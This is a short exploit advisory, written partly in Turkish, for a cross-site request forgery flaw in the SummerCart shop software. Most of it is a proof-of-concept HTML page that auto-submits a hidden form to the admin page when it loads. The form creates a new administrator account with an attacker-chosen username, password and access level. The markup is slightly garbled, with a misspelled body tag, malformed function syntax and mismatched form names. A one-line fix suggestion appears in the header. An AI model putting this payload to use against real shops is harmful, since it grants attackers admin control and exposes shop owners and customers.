< ------------------- header data start ------------------- >

#############################################################

# Application Name : SummerCart

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form name=form1

action=http://www.SITE.com/admin/administrators.php?sortBy=Administratorusername&sortDir=&page=

method=post name=mainform>
<input name=Administratorusername type=hidden value=addadd size=21 />
<input name=Administratorpassword type=hidden value=addadd size=21 />
<input type=hidden name=AdministratorEmail value=[email protected]/>
<input name=’admin_mail’ type=’hidden’ value=’[email protected]’ />
<select name=AdministratorAccessLevel id=accessLevel><option value=2 selected=selected>
<input type=submit name=new value=create class=button />
<input type=hidden name=action value=dmExeccreate />

< -- bug code end of -- >